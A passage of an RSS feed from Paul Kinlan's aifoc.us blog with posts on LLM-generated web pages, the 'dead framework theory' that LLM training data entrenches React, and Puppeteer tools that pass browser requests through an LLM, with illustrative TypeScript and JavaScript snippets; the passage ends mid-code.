<p>By understanding the user&rsquo;s context, we can also be a lot more progressive. Progressive enhancement starts with a functional baseline and adds features based on the browser&rsquo;s capabilities. By sending the HTTP headers on the request through to the LLM, we can influence the output of the LLM to produce code that is the best possible experience for the browser (e.g., Chrome, Safari or Firefox) and the platform (e.g., desktop or mobile). This makes it even more important that API documentation and best practices are in the model&rsquo;s training data or the tool&rsquo;s context. As we&rsquo;ve seen with Progressive Enhancement, it&rsquo;s still a hurdle to get businesses to accept that the site doesn&rsquo;t work exactly the same everywhere.</p>
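<p>Here is a small sketch of what &ldquo;sending the HTTP headers through to the LLM&rdquo; could look like. It assumes the request headers arrive as a plain object and forwards only an allow-list, so that cookies and credentials never reach the model. <code>describeClient</code>, the allow-list and the prompt wording are my own illustrative choices; the header names themselves are standard request headers and client hints.</p>

```typescript
// Hypothetical sketch: the allow-list and wording are illustrative choices.
const CONTEXT_HEADERS: string[] = [
  "user-agent",
  "sec-ch-ua-platform",
  "sec-ch-ua-mobile",
  "accept-language",
  "save-data",
];

function describeClient(headers: { [name: string]: string }): string {
  // Header names are case-insensitive, so normalise them before the lookup.
  const normalized: { [name: string]: string } = {};
  for (const name of Object.keys(headers)) {
    normalized[name.toLowerCase()] = headers[name];
  }
  // Keep only the allow-listed headers, in a stable order.
  const lines: string[] = [];
  for (const name of CONTEXT_HEADERS) {
    const value = normalized[name];
    if (value !== undefined && value !== "") {
      lines.push(name + ": " + value);
    }
  }
  if (lines.length === 0) {
    return "No client hints available; generate a conservative baseline page.";
  }
  return "Tailor the page to this client, keeping a functional baseline:\n" + lines.join("\n");
}
```

<p>The fallback branch is the progressive enhancement part: with no context, the renderer is asked for the baseline rather than a guess.</p>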
<p>The real big challenge that I see is security and the validation of the intent. How do we ensure that the generated code is safe, secure, and does not expose vulnerabilities? We need to build robust &ldquo;element handlers&rdquo; that can validate and sanitize the generated code before it goes live, or even force the pages to run in highly sandboxed and CSP-restricted environments.</p>
<p>CSS is (in my eyes) the correct layering for the technology that is HTML. It got us out of spacer.gif hell and allowed us to separate content from presentation.</p>
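<p>Going back to the security challenge for a moment, this is a minimal sketch of the &ldquo;sandboxed and CSP-restricted&rdquo; idea, assuming each element handler declares up front which origins its generated code may use. <code>ElementPolicy</code>, <code>buildCsp</code> and <code>wrapInSandbox</code> are hypothetical names, and a real deployment would need a much more careful policy than this.</p>

```typescript
// Hypothetical sketch: a handler declares the origins its output may touch.
interface ElementPolicy {
  scriptOrigins: string[]; // e.g. ["https://js.stripe.com"] for a checkout button
  frameOrigins: string[];
  formTargets: string[];
}

// Build a Content-Security-Policy value that denies everything not declared.
function buildCsp(policy: ElementPolicy): string {
  const list = function (origins: string[]): string {
    return origins.length > 0 ? origins.join(" ") : "'none'";
  };
  return [
    "default-src 'none'",
    "style-src 'unsafe-inline'",
    "img-src https:",
    "script-src " + list(policy.scriptOrigins),
    "frame-src " + list(policy.frameOrigins),
    "form-action " + list(policy.formTargets),
    "base-uri 'none'",
  ].join("; ");
}

// Escape generated HTML so it can sit inside a double-quoted srcdoc attribute.
function escapeAttribute(value: string): string {
  return value.replace(/&/g, "&amp;").replace(/"/g, "&quot;");
}

// Wrap the generated markup in an iframe without allow-same-origin, so its
// scripts run in an opaque origin, away from the host page's data.
function wrapInSandbox(generatedHtml: string): string {
  return '<iframe sandbox="allow-scripts allow-forms" srcdoc="' +
    escapeAttribute(generatedHtml) + '"></iframe>';
}
```

<p>Neither layer validates intent, which is the harder half of the problem, but together they limit what a bad generation can do.</p>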
<p>Headless CMSs were a step in the right direction because they made content management more flexible, but they are just a stopgap. The real future is about separating content from presentation and functionality at a higher level of abstraction <a href="https://blog.almaer.com/english-will-become-the-most-popular-development-language-in-6-years/">using the user&rsquo;s language</a>, and using LLMs to generate the &ldquo;chrome&rdquo; based on the author&rsquo;s intent. If we follow this model, I think we can get people out of the vendor lock-in that we see with prescriptive frameworks and platforms, and make the web the best and easiest place for everyone to publish their content.</p>
]]></content:encoded></item><item><title>dead framework theory</title><link>https://aifoc.us/dead-framework-theory/</link><pubDate>Sun, 12 Oct 2025 23:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/dead-framework-theory/</guid><description>&lt;p>&lt;em>These are my opinions and are ruminations on what might be happening as more and more developers use LLMs and Frameworks to build on the web.&lt;/em>&lt;/p>
&lt;p>In October last year I wrote &amp;ldquo;&lt;a href="https://paul.kinlan.me/will-we-care-about-frameworks-in-the-future/">will developers care about frameworks in the future?&lt;/a>&amp;rdquo; predicting that LLMs would abstract away framework choice. I was wrong—or at least, wrong about the timeline.&lt;/p>
&lt;p>The reality is more interesting and more permanent: &lt;strong>React isn&amp;rsquo;t competing with other frameworks anymore. React has become the platform.&lt;/strong> And if you&amp;rsquo;re building a new framework, library or browser feature today, you need to understand that you&amp;rsquo;re not just competing with React—you&amp;rsquo;re competing against a self-reinforcing feedback loop between LLM training data, system prompts, and developer output that makes displacing React functionally impossible.&lt;/p></description><content:encoded><![CDATA[<p><em>These are my opinions and are ruminations on what might be happening as more and more developers use LLMs and Frameworks to build on the web.</em></p>
<p>In October last year I wrote &ldquo;<a href="https://paul.kinlan.me/will-we-care-about-frameworks-in-the-future/">will developers care about frameworks in the future?</a>&rdquo; predicting that LLMs would abstract away framework choice. I was wrong—or at least, wrong about the timeline.</p>
<p>The reality is more interesting and more permanent: <strong>React isn&rsquo;t competing with other frameworks anymore. React has become the platform.</strong> And if you&rsquo;re building a new framework, library or browser feature today, you need to understand that you&rsquo;re not just competing with React—you&rsquo;re competing against a self-reinforcing feedback loop between LLM training data, system prompts, and developer output that makes displacing React functionally impossible.</p>
<p>If you look at what Replit, Bolt, and similar tools are doing, they&rsquo;re not trying to abstract away frameworks—they&rsquo;re <a href="https://github.com/x1xhlol/system-prompts-and-models-of-ai-tools/blob/7e9f6102c7d164dfdbfca3bfd66f3d8ad5c0b2cc/Open%20Source%20prompts/Bolt/Prompt.txt#L275">explicitly hardcoding React into their system prompts</a>. They have to. If you&rsquo;re building a tool today to attract developers, you need to give them code they can maintain. And &ldquo;code developers can maintain&rdquo; now means &ldquo;React&rdquo; for the vast majority of web developers.</p>
<p><a href="https://trends.builtwith.com/javascript/React">According to builtwith.com, there were +13m sites outside of the top 1m deployed with React in the last 12 months</a>. Look at these curves:</p>
<figure><img src="/images/react-builtwith-all-time.png"
    alt="React usage over time"><figcaption>
      <p>React usage over time</p>
    </figcaption>
</figure>

<figure><img src="/images/react-builtwith-12mo.png"
    alt="React usage over the last 12 months"><figcaption>
      <p>React usage over the last 12 months</p>
    </figcaption>
</figure>

<p>However, <a href="https://httparchive.org/reports/techreport/tech?tech=ALL#adoption">HTTP Archive</a> tells a different story. React usage has stalled at 1.2 million mobile origins vs 55 million origins as reported by Builtwith.</p>
<figure><img src="/images/react-http-archive-all.png"
    alt="HTTP Archive. React usage over the last 6 months"><figcaption>
      <p>HTTP Archive. React usage over the last 6 months</p>
    </figcaption>
</figure>

<p>The dataset sizes are vastly different. HTTP Archive looks over <a href="/images/http-archive-origins-over-time.png">some 12-16 million origins</a>, while <a href="https://trends.builtwith.com/javascript/React">Builtwith is reportedly looking</a> at some <a href="/images/built-with-coverage.png">414 million <em>root domains</em></a>. Sites also don&rsquo;t get into HTTP Archive unless there is some amount of usage and many sites in Builtwith might be parked domains or sites that are not actively being used.</p>
<p>Looking at the top 1m, the detection rate is more aligned: 140k vs 160k.</p>
<figure><img src="/images/react-http-archive-top-1m.png"
    alt="HTTP Archive. React usage in the top 1m"><figcaption>
      <p>HTTP Archive. React usage in the top 1m</p>
    </figcaption>
</figure>

<figure><img src="/images/react-builtwith-top-1m.png"
    alt="Builtwith React usage in the top 1m"><figcaption>
      <p>Builtwith React usage in the top 1m</p>
    </figcaption>
</figure>

<p>We&rsquo;re looking at about 12-18% of sites in the top 1m. Take all these numbers with a pinch of salt. The detection can be broken, the datasets are different sizes and the definitions of what is being measured are different. But the trends feel undeniable: React&rsquo;s growth continues while competitors <a href="/images/builtwith-angular-12mo.png">like Angular, sadly stagnate</a>.</p>
<p>So what has driven the uptick in React sites? My read of the data suggests LLM tools over the last 12-18 months are preferring to output React code.</p>
<p>Look at token growth on OpenRouter. Programming tools are <a href="https://aifoc.us/token-slinging">burning through billions of tokens a day</a> via just one gateway. The curves look similar:</p>
<figure><img src="/images/open-router-tokens-oct.png"
    alt="OpenRouter token usage over time"><figcaption>
      <p>OpenRouter token usage over time</p>
    </figcaption>
</figure>

<p>Correlation is not causation, and only the tool creators see the full picture as tokens flow through their systems. But the timing is striking: massive token growth coinciding with massive React deployment growth.</p>
<p>The models and the tools are preferring the tools that developers are already using, and it&rsquo;s driving a self-reinforcing cycle of adoption. If you are launching a new API or tool today, you need to consider how it will be adopted by the ecosystem and how to get it into the training corpus of the LLMs.</p>
<p>We have two loops of feedback in play here:</p>
<ol>
<li>React dominates the existing web (~13M+ new sites in 12 months)</li>
<li>LLMs train on the existing web</li>
<li>LLMs output React by default</li>
<li>New sites built with LLMs use React</li>
<li>More React sites exist for future training</li>
<li>Go to step 2</li>
</ol>
<p>And&hellip;</p>
<ol>
<li>React dominates the developer ecosystem</li>
<li>IDEs and tools that developers use preferentially output React</li>
<li>Tools ask LLMs to output React by default</li>
<li>New sites built are using React</li>
<li>More React sites exist to increase demand for tools to output React</li>
<li>Go to step 1</li>
</ol>
<p>I don&rsquo;t actually know if this is bad or good. We&rsquo;re getting more sites on the web and they&rsquo;re all pretty high quality. But it does create barriers for new frameworks, tools and web platform features that we need to understand. Specifically when:</p>
<ol>
<li>Your framework isn&rsquo;t in the training data because it&rsquo;s new</li>
<li>Tool creators hardcode React because that&rsquo;s what developers know today</li>
<li>Developers expect React output because that&rsquo;s what works</li>
<li>Companies won&rsquo;t use your framework if their developers can&rsquo;t maintain it</li>
<li>React has thousands of libraries; you have dozens</li>
</ol>
<p>If you launch a new framework, library or browser feature today, even if it&rsquo;s technically superior, you need to:</p>
<ul>
<li>Get into LLM training data (12-18 month lag minimum)</li>
<li>Convince tool creators to modify system prompts (requires existing adoption)</li>
<li>Build a comprehensive library ecosystem (years of development)</li>
<li>Overcome developer inertia and get developers to ask for it</li>
</ul>
<p>By the time you&rsquo;ve done the first of these, the ecosystem using React has generated another 10M+ sites. You might flip that order and run a massive campaign to win developer mind share, supplemented with paid integrations into the library ecosystem. We might even see new business models where framework and library authors pay tooling providers to include their framework in system prompts. But even then, you&rsquo;re fighting against entrenched patterns in both React libraries AND LLM training data.</p>
<p>This isn&rsquo;t about React being the best tool or that its model is good for LLMs (I don&rsquo;t see any evidence there at all). It&rsquo;s about React being past the point where network effects make alternatives unviable.</p>
<p>Here&rsquo;s what brought this home for me: Last week I used Claude to build a Chrome Extension using Chrome&rsquo;s built-in <code>prompt</code> API. Claude dutifully wrote the entire extension, but used <code>self.ai.languageModel</code>—the API from 6 months ago. The current API is <code>LanguageModel.create()</code>, but that wasn&rsquo;t in the training corpus.</p>
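<p>To show the gap between the two shapes, here is a small detection sketch. Only the two names come from the experience above; the <code>detectPromptApi</code> helper is hypothetical, and the assumption that the older namespace also exposed a <code>create()</code> method is mine.</p>

```typescript
// Hypothetical helper; only the two API names come from the post.
type PromptApiShape = "LanguageModel" | "self.ai.languageModel" | "unavailable";

// A loose description of the global scope, so this can be tested with mocks.
interface ScopeLike {
  LanguageModel?: { create?: unknown };
  ai?: { languageModel?: { create?: unknown } };
}

function detectPromptApi(scope: ScopeLike): PromptApiShape {
  // Prefer the current shape: LanguageModel.create()
  if (scope.LanguageModel !== undefined && typeof scope.LanguageModel.create === "function") {
    return "LanguageModel";
  }
  // Fall back to the older namespaced shape that the model generated.
  // Assumption: it exposed create() in the same way.
  const legacy = scope.ai !== undefined ? scope.ai.languageModel : undefined;
  if (legacy !== undefined && typeof legacy.create === "function") {
    return "self.ai.languageModel";
  }
  return "unavailable";
}
```

<p>Code generated against the older shape would land in the last two branches on a current browser, which is exactly the failure I hit.</p>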
<p>Add in the fact that it can take years of <a href="https://web.dev/blog/interop-2025">Interop</a> work to get a feature to the point it becomes &ldquo;<a href="https://developer.mozilla.org/en-US/docs/Glossary/Baseline/Compatibility#:~:text=Features%20listed%20as%20newly%20available%20work%20in%20at%20least%20the%20latest%20stable%20version%20of%20each%20of%20the%20Baseline%20browsers%2C%20but%20may%20not%20work%20with%20older%20browsers%20and%20devices.">Baseline newly-available</a>&rdquo; and then another 30 months for it to reach a point where it&rsquo;s &ldquo;<a href="https://developer.mozilla.org/en-US/docs/Glossary/Baseline/Compatibility#:~:text=Features%20listed%20as%20widely%20available%20have%20a%20consistent%20history%20of%20support%20in%20each%20of%20the%20Baseline%20browsers%20for%20at%20least%202.5%20years.">Baseline widely-available</a>&rdquo;. By that time, the ecosystem has moved on, and the feature is competing against entrenched patterns in both React libraries AND LLM training data.</p>
<p>This is the new reality: <strong>If it&rsquo;s not in the LLM training data, it doesn&rsquo;t exist.</strong> Not for 12-18 months at least: not until the next model training cycle, and not until enough examples exist in the wild to statistically matter.</p>
<p>Now apply this to frameworks:</p>
<ul>
<li><strong>Web platform APIs</strong>: 0-6 months of real-world usage before training cutoff</li>
<li><strong>New frameworks</strong>: 0-6 months of real-world usage before training cutoff</li>
<li><strong>React patterns</strong>: 10+ years of accumulated examples</li>
</ul>
<p>Today, if your framework or documentation isn&rsquo;t in the training corpus of the LLM, then it won&rsquo;t be output. If the system prompt of the tool a developer uses doesn&rsquo;t have your API, library or framework, then it&rsquo;s not in the output. And if the user of a tool doesn&rsquo;t ask for a specific API, library or framework, then it won&rsquo;t be output. Model providers are skewing it so the model prefers a certain style, or framework or library.</p>
<p>The same dynamic applies to new web platform APIs designed to replace framework features. Consider the typical pattern:</p>
<ol>
<li>Browser teams identify a common pattern in frameworks (e.g., CSS Nesting instead of Sass)</li>
<li>Multi-year standardization process begins</li>
<li>Feature ships in browsers</li>
<li>Developers&hellip; keep using the framework pattern</li>
</ol>
<p>Why? Because:</p>
<ul>
<li><strong>The LLM learned the old pattern</strong>: Sass has 15 years of examples; CSS Nesting has 1 or 2 years</li>
<li><strong>The framework already works</strong>: React developers use styled-components, Tailwind, CSS modules</li>
<li><strong>The ecosystem is built</strong>: Thousands of React component libraries use existing CSS patterns</li>
<li><strong>There&rsquo;s no incentive to switch</strong>: The new platform feature doesn&rsquo;t make the site better for users</li>
</ul>
<p>For example:</p>
<ul>
<li>People loved <a href="https://sass-lang.com/">Sass</a>, but you need a build step, so we have <a href="https://developer.chrome.com/docs/css-ui/css-nesting">CSS Nesting</a>. However, it&rsquo;s rarely output because preprocessor patterns are more common in the corpus, and React developers already have CSS-in-JS solutions that LLMs know how to output.</li>
<li>Carousels are hard to build, so maybe we should have them as an intrinsic part of the platform. But there are <a href="https://flowbite.com/docs/components/carousel/#:~:text=Create%20a%20new%20carousel%20object%20using%20the%20options%20set%20above.">tons</a> of <a href="https://daisyui.com/components/carousel/?lang=en">libraries</a> that <a href="https://getbootstrap.com/docs/4.0/components/carousel/">create</a> great <a href="https://www.npmjs.com/package/react-multi-carousel">carousels</a> that are already in LLM training data.</li>
</ul>
<p>As an author of many sites, I love these features. CSS Nesting alone lets me structure my CSS in a way that I personally find easier to read and maintain. But it doesn&rsquo;t really change the quality of the experience of the site for the person using my site. It doesn&rsquo;t change the performance of the site. It doesn&rsquo;t change how accessible my site is. It just makes it easier for me to write and maintain.</p>
<p>The only new platform features that matter are ones that <em>can&rsquo;t be built in user-space</em>, like:</p>
<ul>
<li>Multi-page view transitions (new navigation capabilities)</li>
<li>WebGPU (fundamentally new compute access)</li>
<li>WebAuthn and Passkeys (security primitives)</li>
</ul>
<p>Everything else is competing against entrenched patterns in both React libraries AND LLM training data.</p>
<p>There are at least three constituencies to consider here:</p>
<ol>
<li>
<p>The &ldquo;head&rdquo; businesses building on the web - The top 1000 sites take the lion&rsquo;s share of traffic and revenue on the web, and we don&rsquo;t see massive technology shifts in the top 1000 through to the top 1 million. These are established sites with established teams, and shifting technology is hard, often with unclear benefit beyond potential improvements to product velocity. They are likely to be using LLM-based tooling to help increase velocity, but they are not going to be switching frameworks or libraries lightly.</p>
</li>
<li>
<p>The &ldquo;middle&rdquo; businesses building on the web - The next 10 million sites are being built by small teams and individuals who will likely be using LLMs to build new sites completely and, unless they prompt otherwise, will use the defaults the tools output.</p>
</li>
<li>
<p>The &ldquo;long tail&rdquo; - These are people who are not formal web developers and who will use tools like Lovable, Replit, or even build directly in a chat app. They may never need to look at the code, so what do any of these new APIs do to help them build better sites? They represent the growth in the platform, and we have an <a href="/transition/">opportunity for millions more people to deploy on to the web</a>.</p>
</li>
</ol>
<p>The people in groups 2 and 3 are the ones driving the growth in sites on the web, and people building with these tools are unlikely to know about Passkeys, WebAuthn, Web Components, CSS Nesting, View Transitions, or any of the other new features being added to the platform. They just want a site created that does what they need it to do.</p>
<p>The thing is, normal people using the web don&rsquo;t care about the tools; frameworks and libraries are not something that concerns them. What concerns people is the experience of using the page. Does it load quickly enough? Are the interactions smooth? Does the site actually do what I need it to do?</p>
<p>Today, if you are a company targeting developers in any of those categories (LLM or a tool that outputs code from an LLM), to not output React by default is to limit your potential audience as your competitors are serving the current demand.</p>
<p>Now consider the current working model for code-generating LLM tools, which reflect the ecosystem that they are trained on. This means that any new API, framework or library has a large hurdle to get over before it will be output by the tool. The fact that <em>any</em> new feature might not be in the training corpus, <em>and</em> will not be prevalent enough to have its usage patterns and idioms ingrained in the training and, by extension, the output of an LLM, should be a concern to the people building new platform features.</p>
<p>Looking at today&rsquo;s trend of tools primarily outputting React code, the comprehensive ecosystem of user-space libraries can do almost everything, from custom select boxes to specialized date components. I can&rsquo;t see a world where a new platform feature is going to displace the libraries in use, nor can I see a world where a new framework is going to displace React in the short to medium term. That said, I really love what the Remix folks are doing with Remix 3, and I will keenly watch how it is adopted and how LLMs might pick it up to see how this post plays out in the real world. I&rsquo;d love to see how long it takes for LLMs to start outputting Remix code without specific prompting or including docs in the context.</p>
<p><strong>For framework authors:</strong> Building a new framework is building a product that LLMs won&rsquo;t output for 12-18 months minimum, that has no library ecosystem, that developers don&rsquo;t know, and that companies won&rsquo;t adopt. You&rsquo;re not competing with React&rsquo;s technical merits; you&rsquo;re competing with React&rsquo;s statistical dominance in every LLM training corpus and every tool provider&rsquo;s preference for their customers.</p>
<p><strong>For platform developers:</strong> Developer experience features (syntactic sugar, convenience APIs) are competing against established React patterns in LLM training data. They will not be adopted at scale. Focus on fundamental capabilities that can&rsquo;t be built in user-space. For features that browser developers are creating today, we need to take a long hard look at the benefits that they will bring to the user and not the developer. To that extent, many of the platform features ranging from Web Components through to syntactical changes are just not needed by the vast majority of people building sites in the coming years.</p>
<p><strong>For tool creators (e.g., IDEs):</strong> If you&rsquo;re not outputting React by default, you&rsquo;re limiting your addressable market. Your competitors are serving current demand. You can&rsquo;t afford to be principled about framework diversity.</p>
<p>Dead framework theory isn&rsquo;t about frameworks dying. It&rsquo;s about new frameworks being dead on arrival in a world where React has become the platform (at least as long as people need to maintain code).</p>
<p>As an industry we should absolutely innovate and build new frameworks, libraries and platform features. We need innovation to push the web forward and create competition. But we need to be aware of the dynamics at play and have clear strategies to get our work into LLM training corpora, system prompts, and developer minds.</p>
<p>If the industry continues its current focus on maintainability and developer experience, we&rsquo;ll end up in a world where the web is built by LLMs using React and a handful of libraries entrenched in the training data. Framework innovation stagnates. Platform innovation focuses elsewhere. React becomes infrastructure—invisible and unchangeable.</p>
<p>But here&rsquo;s the optimistic take: If LLM usage continues to grow, tooling vendors will have to compete with each other on this homogenized ecosystem. When everyone outputs React by default, you can&rsquo;t differentiate on framework choice. You have to compete on output quality. Market forces shift the focus from developer experience to user experience.</p>
<p>For either scenario, we need to start competing on user outcomes. I really want to see Evals and Benchmarks that focus on quality outcomes like Core Web Vitals did for performance. When tools compete to attract users, the ones that output meaningfully better experiences will win. This competitive pressure will incentivize the entire ecosystem to optimize for users, not developers.</p>
<p>And if we succeed? Then in the long run, <a href="https://paul.kinlan.me/will-we-care-about-frameworks-in-the-future/">the framework will become irrelevant</a> as the models improve to the point people <a href="https://blog.almaer.com/english-will-become-the-most-popular-development-language-in-6-years/">manipulate sites by words alone</a> and the LLM providers believe they can create better outcomes with their own frameworks or tuning (hat tip to Ade). The delivery technology becomes an optimized compiled output that meets user needs—whether it&rsquo;s &ldquo;React&rdquo; or something else stops mattering.</p>
<p>As for the raw, naked, web platform? Focus on fundamentally new capabilities—the things that can&rsquo;t be built in user-space, or where there&rsquo;s clear user-experience benefit that can&rsquo;t be achieved with libraries.</p>
]]></content:encoded></item><item><title>interception</title><link>https://aifoc.us/interception/</link><pubDate>Sun, 21 Sep 2025 13:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/interception/</guid><description>&lt;p>This is a very quick post. I had an idea as I was walking the dog this evening, and I wanted to build a functioning demo and write about it within a couple of hours.&lt;/p>
&lt;p>While the post and idea started this evening, the genesis of the idea has been brewing for a while and goes back over a year to August 2024, when I wrote about &lt;a href="https://paul.kinlan.me/fictitious-web/">being sucked into a virtual internet&lt;/a>. WebSim has been on my mind for a while, because I loved the idea of being able to simulate my own version of the web using the browser directly and not via another web page. And a couple of weeks ago, I managed to work out how to get &lt;a href="https://pptr.dev/">Puppeteer&lt;/a> to intercept requests and respond with content generated via an LLM.&lt;/p></description><content:encoded><![CDATA[<p>This is a very quick post. I had an idea as I was walking the dog this evening, and I wanted to build a functioning demo and write about it within a couple of hours.</p>
<p>While the post and idea started this evening, the genesis of the idea has been brewing for a while and goes back over a year to August 2024, when I wrote about <a href="https://paul.kinlan.me/fictitious-web/">being sucked into a virtual internet</a>. WebSim has been on my mind for a while, because I loved the idea of being able to simulate my own version of the web using the browser directly and not via another web page. And a couple of weeks ago, I managed to work out how to get <a href="https://pptr.dev/">Puppeteer</a> to intercept requests and respond with content generated via an LLM.</p>
<p><code>npx fauxmium</code> is the command, and there are more details on my <a href="https://paul.kinlan.me/projects/fauxmium/">personal blog</a>. The code is on <a href="https://github.com/paulkinlan/fauxmium">GitHub</a>. You can watch it in action on my YouTube channel:</p>
<div class="youtube">
      <iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/NZ0D2MwNbrM?autoplay=0&amp;controls=1&amp;end=0&amp;loop=0&amp;mute=0&amp;start=0" title="YouTube video"></iframe>
    </div>

<p>The architecture of Fauxmium is relatively straightforward (although there is more complexity in my repository as I try to stream responses). You launch a browser via Puppeteer and set it up to <a href="https://pptr.dev/guides/network-interception">intercept all requests</a>. When a request is made, you send the URL to an LLM (along with a prompt to help it generate content), and it generates HTML or images, which are then returned to the browser.</p>
<figure><img src="/images/fauxmium.png"
    alt="Fauxmium in action">
</figure>
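<p>As a rough sketch of that flow (this is not the Fauxmium source): Puppeteer&rsquo;s <code>page.setRequestInterception(true)</code> and its <code>request</code> event hand you each request, and <code>request.respond()</code> lets you answer it yourself. The <code>createFauxHandler</code> and <code>generate</code> names are hypothetical; <code>generate</code> stands in for whatever LLM call you use.</p>

```javascript
// Build a Puppeteer "request" listener that answers every request with
// generated content. `generate` is a hypothetical async function that
// takes a URL and resolves to an HTML string; swap in a real LLM call.
function createFauxHandler(generate) {
  return async (request) => {
    let body;
    try {
      body = await generate(request.url());
    } catch {
      // If generation fails, abort the request rather than leave it pending.
      await request.abort();
      return;
    }
    await request.respond({
      status: 200,
      contentType: "text/html; charset=utf-8",
      body,
    });
  };
}

// Wiring it up with Puppeteer (assumes `page` came from browser.newPage()):
//   await page.setRequestInterception(true);
//   page.on("request", createFauxHandler(myGenerate));
```

<p>Keeping the handler separate from the browser wiring means you can exercise it with a fake request object before pointing it at a real page.</p>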

<p>This evening, I was wondering if I could take it a step further and have a large language model (LLM) sit at every point of the request lifecycle.</p>
<p>So I built a proof of concept off the back of <code>fauxmium</code> called <code>interceptium</code> [<a href="https://github.com/paulkinlan/interceptium">code</a>]. You launch <a href="https://developer.chrome.com/blog/chrome-for-testing">Chrome for Testing</a> via Puppeteer and set it up to intercept every request. Then, <a href="https://github.com/PaulKinlan/interceptium/blob/e0389616f2b087033054b4f60e47de2d2cb739af/browser.js#L67">when a request is made</a>, you decide if you want to handle the request or let it go to the network. If you want to handle it, you have the chance to change the request (you might want to automatically generate post-data, for example). You send the potentially modified request to the network, get the response, and then you can pass the request and response data to an LLM, which generates HTML that is then returned to the browser.</p>
<figure><img src="/images/interceptium.png"
    alt="Interceptium and its ability to change request/response">
</figure>

<p>Under the hood this looks like a typical request router that you might see in a web framework. This enables you to have multiple interceptors that can handle different types of requests. You can have one interceptor that handles requests for home pages and summarizes the content and another that will modify an image through something like <code>nano-banana</code>.</p>
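<p>To make the routing idea concrete, here is a minimal sketch under my own assumptions rather than the code in the repository. The <code>pickInterceptor</code>, <code>handleRequest</code> and <code>fetchFromNetwork</code> names are hypothetical; the interceptor shape (<code>test</code>, <code>requestHandler</code>, <code>responseHandler</code>) follows the <code>SummaryInterceptor</code> in this post.</p>

```javascript
// Pick the first interceptor whose test() accepts the request.
function pickInterceptor(interceptors, request) {
  return interceptors.find((interceptor) => interceptor.test(request)) ?? null;
}

// Run one request through the lifecycle. `fetchFromNetwork` is a
// hypothetical async function that takes a request and resolves to an
// object with `status`, `headers` and an async `text()` method.
async function handleRequest(interceptors, request, fetchFromNetwork) {
  const interceptor = pickInterceptor(interceptors, request);
  if (interceptor === null) {
    // Nobody claimed it: the caller should let it go to the network.
    return { handled: false };
  }
  // Optionally rewrite the outgoing request (e.g. generate post-data).
  const outgoing = interceptor.requestHandler
    ? await interceptor.requestHandler(request)
    : request;
  const response = await fetchFromNetwork(outgoing);
  // Optionally rewrite the response (e.g. summarize it with an LLM).
  const result = interceptor.responseHandler
    ? await interceptor.responseHandler(outgoing, response)
    : {
        status: response.status,
        headers: response.headers,
        body: await response.text(),
      };
  return { handled: true, ...result };
}
```

<p>First match wins in this sketch, so the order of the list is the routing priority. A real router might instead chain several interceptors over the same response.</p>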
<p>A concrete example is below. I like summaries, so I have a <code>SummaryInterceptor</code> that intercepts requests to my blog&rsquo;s homepage, and I ask the LLM to summarize the content of the page. The LLM returns a summary in HTML format, which is then rendered in the browser.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-JavaScript" data-lang="JavaScript"><span style="display:flex;"><span><span style="color:#66d9ef">import</span> { <span style="color:#a6e22e">generateText</span> } <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#34;ai&#34;</span>;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">import</span> { <span style="color:#a6e22e">createGroq</span> } <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#34;@ai-sdk/groq&#34;</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">groq</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">createGroq</span>({ <span style="color:#a6e22e">apiKey</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">process</span>.<span style="color:#a6e22e">env</span>.<span style="color:#a6e22e">GROQ_API_KEY</span> });
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">class</span> <span style="color:#a6e22e">SummaryInterceptor</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">#</span><span style="color:#a6e22e">test</span> <span style="color:#f92672">=</span> (<span style="color:#a6e22e">request</span>) =&gt; {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#e6db74">&#34;Testing request:&#34;</span>, <span style="color:#a6e22e">request</span>.<span style="color:#a6e22e">url</span>());
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">url</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> <span style="color:#a6e22e">URL</span>(<span style="color:#a6e22e">request</span>.<span style="color:#a6e22e">url</span>());
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">url</span>.<span style="color:#a6e22e">hostname</span> <span style="color:#f92672">===</span> <span style="color:#e6db74">&#34;paul.kinlan.me&#34;</span> <span style="color:#f92672">&amp;&amp;</span> <span style="color:#a6e22e">url</span>.<span style="color:#a6e22e">pathname</span> <span style="color:#f92672">===</span> <span style="color:#e6db74">&#34;/&#34;</span>;
</span></span><span style="display:flex;"><span>  };
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">#</span><span style="color:#a6e22e">requestHandler</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">null</span>;
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">#</span><span style="color:#a6e22e">responseHandler</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">async</span> (<span style="color:#a6e22e">request</span>, <span style="color:#a6e22e">response</span>) =&gt; {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#e6db74">&#34;Handling response for:&#34;</span>, <span style="color:#a6e22e">request</span>, <span style="color:#a6e22e">response</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">headers</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">response</span>.<span style="color:#a6e22e">headers</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">status</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">response</span>.<span style="color:#a6e22e">status</span>;
